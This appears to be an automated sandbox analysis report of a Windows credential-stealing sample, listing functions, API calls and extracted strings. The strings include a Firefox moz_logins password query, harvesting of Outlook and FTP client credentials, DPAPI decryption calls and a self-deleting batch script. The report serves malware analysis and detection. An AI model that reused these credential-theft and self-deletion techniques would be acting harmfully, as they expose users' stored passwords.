Opcode ID: dc10be99b55b7ac3ef2c85290e9616e512f733d238ff37287e66b294a3da19be
Instruction ID: e7b80ddee4c2de893b74945ef0147499207a29abacf94d9bc571b3335d8a863c
Opcode Fuzzy Hash: dc10be99b55b7ac3ef2c85290e9616e512f733d238ff37287e66b294a3da19be
Instruction Fuzzy Hash: 45112875A00208EBDF118F94DC84BDEBB74FB84750F0484BABA11662D0C778AA90CB58

Function 00402D3E Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
Instruction ID: e5c8a9ed63948a3fc33c9cd5da8f45d519a938237f1a59f4d152d486bdaad98d
Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
Instruction Fuzzy Hash: 85121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648

Function 00411EE9 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16e1f271713342edd896b7290f6c6c7e68fee66b4334ee17e5165b4637359078
Instruction ID: 698580cbdec7d4d283496ace6931a8c924f275817c3a7d75ee91b9fbc35eb567
Opcode Fuzzy Hash: 16e1f271713342edd896b7290f6c6c7e68fee66b4334ee17e5165b4637359078
Instruction Fuzzy Hash: 8971A137F5053647E7588DAA8C81155E7A2ABC8320B5F837EDD19B7381C974BD2686C0

Function 00610380 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1684799843.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_610000_8WgZHDQckx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8963484dd2edccfe01142f3e14f2035f63a8c6a9a5bb5358b1ed56dadc583d
Instruction ID: b8cd598ba0b6ae51c68eb93c045517833b36da9003072adc0bc72b341ba9d7e0
Opcode Fuzzy Hash: 7a8963484dd2edccfe01142f3e14f2035f63a8c6a9a5bb5358b1ed56dadc583d
Instruction Fuzzy Hash: EA01F270904259ABEF08DF59C1907EDBB76EF45301F28C29AE8651B355D3B8AA80DF80

Function 00409312 Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238COMMON

Download Yara Rule

Strings

---, xrefs: 00409617
ftp., xrefs: 00409540, 0040954B
#2e, xrefs: 004093A3
http://, xrefs: 00409501, 0040950C
https://, xrefs: 0040951D, 00409528
ftp://, xrefs: 004094E5, 004094F0
#2d, xrefs: 00409395
#2c, xrefs: 00409387

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
API String ID: 0-1526611526
Opcode ID: d1d4def20ccee5a01e1114bf6bef1bc0b4ca275b6b8bce62a98731c495edba67
Instruction ID: 2f5e765006b63fd4168535b9d64fe58bb021cda9860781546ff6e9663deb65bb
Opcode Fuzzy Hash: d1d4def20ccee5a01e1114bf6bef1bc0b4ca275b6b8bce62a98731c495edba67
Instruction Fuzzy Hash: D191F671D00109BADF11AFA2DC56BEEBEB1AF04308F20443BF511B11E2DBB94D959B59

Function 0040FDE5 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 118stringfilelibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

GetModuleFileNameA.KERNEL32(00000000,00000105,00000104,00000105,00000105), ref: 0040FE25
GetTempPathA.KERNEL32(00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE37
lstrcatA.KERNEL32(00000105,abcd.bat,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE4B
CreateFileA.KERNEL32(00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE64
lstrcpyA.KERNEL32(00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE77
StrRChrIA.SHLWAPI(00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105), ref: 0040FE83
lstrcpyA.KERNEL32(00000001,abcd.bat,00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105), ref: 0040FE93
CreateFileA.KERNEL32(00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000), ref: 0040FEAA
lstrlenA.KERNEL32( :ijk del %1 if exist %1 goto ijk del %0 ,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FEBA
CloseHandle.KERNEL32(00000104,00000000, :ijk del %1 if exist %1 goto ijk del %0 ,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105), ref: 0040FED1
wsprintfA.USER32 ref: 0040FEE8
LoadLibraryA.KERNEL32(shell32.dll), ref: 0040FEF5
GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 0040FF04

Strings

ShellExecuteA, xrefs: 0040FEFE
open, xrefs: 0040FF17
:ijk del %1 if exist %1 goto ijk del %0 , xrefs: 0040FEB5, 0040FEC0
"%s" , xrefs: 0040FEE0
shell32.dll, xrefs: 0040FEF0
abcd.bat, xrefs: 0040FE43, 0040FE8D

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: File$Createlstrcpy$AddressAllocCloseHandleLibraryLoadLocalModuleNamePathProcTemplstrcatlstrlenwsprintf
String ID: :ijk del %1 if exist %1 goto ijk del %0 $ "%s" $ShellExecuteA$abcd.bat$open$shell32.dll
API String ID: 1579379117-2346035512
Opcode ID: a0cda0ff434185c611cf9080c648d5c3c3fd4a9bce0fce8a69ffecb28466114d
Instruction ID: 70647179b52a2af869578c22019cc88769e88d17494ea788351c456f045e5e9b
Opcode Fuzzy Hash: a0cda0ff434185c611cf9080c648d5c3c3fd4a9bce0fce8a69ffecb28466114d
Instruction Fuzzy Hash: 7A315031F442097AEB2177A28C03FEE7972AB45748F248437B620B51E5DAF94A915A1C

Function 004090A5 Relevance: 22.7, APIs: 8, Strings: 7, Instructions: 165COMMON

Download Yara Rule

Strings

sqlite3.dll, xrefs: 004090F6
ftp., xrefs: 0040920D, 00409218
http://, xrefs: 004091CE, 004091D9
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00409128
https://, xrefs: 004091EA, 004091F5
ftp://, xrefs: 004091B2, 004091BD
mozsqlite3.dll, xrefs: 004090E3

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
API String ID: 0-3560805513
Opcode ID: a5273664712210fbb61a8124bbd0481ac73d9e5f527400acd316efa6600ba795
Instruction ID: c21c2f217904cd2ec998fa265e55fa4182b6c389dea30c275a9b17ac37cbb301
Opcode Fuzzy Hash: a5273664712210fbb61a8124bbd0481ac73d9e5f527400acd316efa6600ba795
Instruction Fuzzy Hash: 33511D71940109BADF11ABA5CC06EEE7E75AF04348F10847BB511B01E3DBBD8E90DA5D

Function 0040AA69 Relevance: 21.2, APIs: 7, Strings: 7, Instructions: 178COMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

wsprintfA.USER32 ref: 0040AAD5
wsprintfA.USER32 ref: 0040AAE8
wsprintfA.USER32 ref: 0040AAFB
wsprintfA.USER32 ref: 0040AB0E
wsprintfA.USER32 ref: 0040AB21
wsprintfA.USER32 ref: 0040AB34
wsprintfA.USER32 ref: 0040AB47

Part of subcall function 0040A94F: lstrlenA.KERNEL32(?), ref: 0040A964

Part of subcall function 0040A94F: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AA1C
Part of subcall function 0040A94F: LocalFree.KERNEL32(00000000), ref: 0040AA4F

Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF

Strings

SiteServer %d\SFTP, xrefs: 0040AB3F
%s\Keychain, xrefs: 0040AB2C
SiteServer %d\WebUrl, xrefs: 0040AAE0
SiteServer %d-User PW, xrefs: 0040AB19
SiteServer %d\Host, xrefs: 0040AACD
SiteServer %d\Remote Directory, xrefs: 0040AAF3
SiteServer %d-User, xrefs: 0040AB06

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
API String ID: 3846021373-1012938452
Opcode ID: 46510ed0be41b775551ad4d3ecfc6927bf16cb3893ab1908f2f6dc69ae9be096
Instruction ID: 38af61a25bba56cbdf77ac4747da24c7cc219a41b90d890c955eb49b7d28db77
Opcode Fuzzy Hash: 46510ed0be41b775551ad4d3ecfc6927bf16cb3893ab1908f2f6dc69ae9be096
Instruction Fuzzy Hash: 2F617472C00209BBEF127FA1DD46EEDBA72AF04308F54813AF514741B1D77A5A60EB59

Function 0040F370 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A0E3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A11C
Part of subcall function 0040A0E3: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A125

Part of subcall function 0040A12E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A16A
Part of subcall function 0040A12E: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A173

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F3B9
lstrcmpiA.KERNEL32(?,identification), ref: 0040F439
lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F44E
lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F471
lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F490
lstrcmpiA.KERNEL32(?,identities), ref: 0040F4AF
CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F510

Strings

identities, xrefs: 0040F4A3
outlook account manager passwords, xrefs: 0040F484
identification, xrefs: 0040F42D
inetcomm server passwords, xrefs: 0040F465
identitymgr, xrefs: 0040F442

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrcmpi$ByteCharFreeMultiTaskWide
String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
API String ID: 636431001-4287852900
Opcode ID: 5c8af7968dd32e3522306e13d8ff2f22c81db888db247289ec3750830519cf20
Instruction ID: 7dc3a59528206952cd36e88bf0209e074c77178959b86019fcdee81e9bc15709
Opcode Fuzzy Hash: 5c8af7968dd32e3522306e13d8ff2f22c81db888db247289ec3750830519cf20
Instruction Fuzzy Hash: 56413A7184021DAAEF219F50CD42FDA7B79BF05304F0041BAFA0875192DB799AE9DFA4

Function 00402C70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,explorer.exe,00000002,00000000), ref: 00402BBC
ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe,00000002,00000000), ref: 00402BE0
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402C0A
OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402C22
ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402C2F
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402C50
CloseHandle.KERNEL32(?), ref: 00402C75
CloseHandle.KERNEL32(?,?), ref: 00402C7D
CloseHandle.KERNEL32(?), ref: 00402C87
Process32Next.KERNEL32(?,00000128), ref: 00402C99
CloseHandle.KERNEL32(?,00000002,00000000), ref: 00402CA9

Strings

explorer.exe, xrefs: 00402BB0

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
String ID: explorer.exe
API String ID: 3144406365-3187896405
Opcode ID: ebdf3defd56763afb44919605ec2b92ab98fb308ae5d4ffafeb5e4091063880e
Instruction ID: c963f6e52928c91b7e97de643080fcb6be788e0da40b7acd60b28e10e8a5620a
Opcode Fuzzy Hash: ebdf3defd56763afb44919605ec2b92ab98fb308ae5d4ffafeb5e4091063880e
Instruction Fuzzy Hash: E4210D30904119ABEF219B61DE49BEE7AB5BB04344F1080F7E509B21E0D7B89F85DF69

Function 0040B867 Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00402745: lstrlenA.KERNEL32(?), ref: 00402779

StrStrIA.SHLWAPI(?,00416560), ref: 0040B87B
lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040B89D

Strings

origin_url, xrefs: 0040B8CA
CONSTRAINT, xrefs: 0040B894, 0040B89C
username_value, xrefs: 0040B8FE
password_value, xrefs: 0040B8E4

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrcmpilstrlen
String ID: CONSTRAINT$origin_url$password_value$username_value
API String ID: 3649823140-2401479949
Opcode ID: 97ad989eda15d304ea17c70c79e3e170fa29adfdd37fe374dbb57d3682f696a7
Instruction ID: 7f0577275ac2e7a4ff8d66a09d66e6f6d7fad68dc333a691803c72995ff089bc
Opcode Fuzzy Hash: 97ad989eda15d304ea17c70c79e3e170fa29adfdd37fe374dbb57d3682f696a7
Instruction Fuzzy Hash: 28119136200108BADF112F25EC419DD3F52AB65398B00C03BF809A41B2E7BDC9D1D79C

Function 004098FB Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

profiles.ini, xrefs: 0040994C
Profile, xrefs: 004099AB
Path, xrefs: 004099CA
IsRelative, xrefs: 004099DE

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 0-4107377610
Opcode ID: 886725e35773898c68a35a456ea5031dfc93a2f1a767919bf75d21d14989aeea
Instruction ID: 2f57eea956b09788083e83053daed65e2f25ed7cd0267cdbf1dd2180b3eb9b3f
Opcode Fuzzy Hash: 886725e35773898c68a35a456ea5031dfc93a2f1a767919bf75d21d14989aeea
Instruction Fuzzy Hash: A4414131E4014ABADF227BA1CC42EAE7F62AF51354F10857BB410741F3DB7D8E91AA19

Function 004042AB Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004042B9
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004042D1
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004042E2
GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004042F1

Strings

IsWow64Process, xrefs: 004042DC
GetNativeSystemInfo, xrefs: 004042CB
kernel32.dll, xrefs: 004042B4

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: AddressProc$CurrentHandleModuleProcess
String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
API String ID: 977827838-3073145729
Opcode ID: acc38963b47003fc72c1d394741c902fac3bd37538990a04b0c4750c7232af4d
Instruction ID: e957a28dad8f20bd674ca0597af700fff60833ef583d508b9e18f8da30b21fec
Opcode Fuzzy Hash: acc38963b47003fc72c1d394741c902fac3bd37538990a04b0c4750c7232af4d
Instruction Fuzzy Hash: 45F05BB2700605A7C71061F56D85BDF25988BC03A8F341537FA15E22C2F9FCCD814168

Function 0040D67F Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

<setting name=", xrefs: 0040D6CC, 0040D6E2
value=", xrefs: 0040D70A, 0040D71D

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: <setting name="$value="
API String ID: 0-3468128162
Opcode ID: 85fc4477013f91673bacdd8b9f18368d1d50f6049be21e76f691ec165c48f192
Instruction ID: 343984eb6a9c56387b750bf0dc89e658c7d3f05e65578c32d84a2233ccce9ec0
Opcode Fuzzy Hash: 85fc4477013f91673bacdd8b9f18368d1d50f6049be21e76f691ec165c48f192
Instruction Fuzzy Hash: 7731C171D04149ABCF11ABE08C41AFEBFB59F1A354F140067E804B72A1E27D4A44DBAE

Function 00401E44 Relevance: 10.6, APIs: 7, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E65
GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E72
CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00401E86
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E9B
CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EAA
CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EB1
CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EC0

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$Create$MappingSizeView
String ID:
API String ID: 3733816638-0
Opcode ID: 8e23c6091eb8b8d46222d4bd7a16ced24ceefb6a7b190282a42a8e05d4c96427
Instruction ID: e58b99f9114672f5a439125ee997312c2d25841e4d564c066b43b0378391f37c
Opcode Fuzzy Hash: 8e23c6091eb8b8d46222d4bd7a16ced24ceefb6a7b190282a42a8e05d4c96427
Instruction Fuzzy Hash: C9117570290305BBEB312F31CC83F493A94AB01B14F208566BA24BD1E6D6F895918A6C

Function 00408512 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

ftp://, xrefs: 004086C6
http://, xrefs: 004086D7
https://, xrefs: 004086E8

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: ftp://$http://$https://
API String ID: 0-2804853444
Opcode ID: ae7cefc7c5333987e4983cd71e008bcbb42f508cd32fa06e4d6a3deba0beb9bf
Instruction ID: bc3b6236dd6c4818a11e2f1327c3646a8c10a5fbccc1043460bbed407a2be996
Opcode Fuzzy Hash: ae7cefc7c5333987e4983cd71e008bcbb42f508cd32fa06e4d6a3deba0beb9bf
Instruction Fuzzy Hash: CE61F631800109FEDF11AF91CE45AEEBBB9EF00348F10847BB841B51A1DB799B95DB98

Function 0040DF29 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

winex=", xrefs: 0040DF76, 0040DF8C
"/>, xrefs: 0040DF9B

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: "/>$winex="
API String ID: 0-1498080979
Opcode ID: c4fe823f2cac692202bec1350e861c86fd880d6b9e02f36f7005e6d626db0ef5
Instruction ID: af0296e32a02ec1832d24190b1df8dde27091d9c0628ece5b9ff4e530f53491d
Opcode Fuzzy Hash: c4fe823f2cac692202bec1350e861c86fd880d6b9e02f36f7005e6d626db0ef5
Instruction Fuzzy Hash: 60314D32D0001ABACF11BBA2CC02DFE7E76AF45344F10843BF501B51B1D7BA5A61AB69

Function 00407FA7 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(0084DAA8,FTPCON), ref: 00407FD5
StrStrIA.SHLWAPI(00849868,FTP CONTROL,00000000,0084DAA8,FTPCON), ref: 00407FE1

Strings

\Profiles, xrefs: 00407FF5
FTP CONTROL, xrefs: 00407FDB
FTPCON, xrefs: 00407FCF
.prf, xrefs: 00408006

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: .prf$FTP CONTROL$FTPCON$\Profiles
API String ID: 0-2908215140
Opcode ID: 903f4a60e5a0711024b0bf041507eda164574e85d0a12bddf26d445a3aad8b10
Instruction ID: 1db41b6092523eeb3e5549db4c42731596d2224b18425ab2775985076d95af50
Opcode Fuzzy Hash: 903f4a60e5a0711024b0bf041507eda164574e85d0a12bddf26d445a3aad8b10
Instruction Fuzzy Hash: 1001F534500645BAEB216B719C06FEF3E599BC1364F24803FF940B61E2EB7C5A8187AC

Function 00401A0F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 00401A22
GlobalLock.KERNEL32(?), ref: 00401A3D

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

